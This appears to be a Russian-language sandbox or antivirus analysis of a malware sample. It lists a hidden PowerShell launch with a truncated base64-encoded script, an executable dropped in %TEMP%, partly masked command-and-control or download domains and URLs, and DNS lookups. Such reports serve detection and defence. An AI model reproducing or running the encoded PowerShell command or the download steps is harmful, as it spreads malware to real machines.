Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACAAJABwAFMAaABvAG0AZQBbADIAMQBdACsAJABwAFMAaABvAG0AZQBbADMANABdACsAJwBYACcAKQAoACAATgBlAHcALQBPAEIASgBlAGMAVAAgAHMAeQBzAHQARQBtAC4ASQBvAC4AUwBUAHIAZQBhAG0AUgBFAEEARABlAHIAKAAgACgAIABOAG...
- %TEMP%\179885.exe
- %TEMP%\179885.exe
- 'ec###pro.com':80
- 'te###kratiya.ru':80
- 'so#.sg':80
- 'so#.sg':443
- 'ro##hill.hu':80
- 'ro##hill.hu':443
- http://ec###pro.com/tleyLN/
- http://te###kratiya.ru/giG1isC/
- http://so#.sg/dbs/media/sJUjDl/
- http://ro##hill.hu/ooOCqD/
- 'so#.sg':443
- 'ro##hill.hu':443
- DNS ASK ec###pro.com
- DNS ASK te###kratiya.ru
- DNS ASK xn######dflk8dk.xn--p1ai
- DNS ASK so#.sg
- DNS ASK ro##hill.hu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACAAJABwAFMAaABvAG0AZQBbADIAMQBdACsAJABwAFMAaABvAG0AZQBbADMANABdACsAJwBYACcAKQAoACAATgBlAHcALQBPAEIASgBlAGMAVAAgAHMAeQBzAHQARQBtAC4ASQBvAC4AUwBUAHIAZQBhAG0AUgBFAEEARABlAHIAKAAgACgAIABOAG...' (со скрытым окном)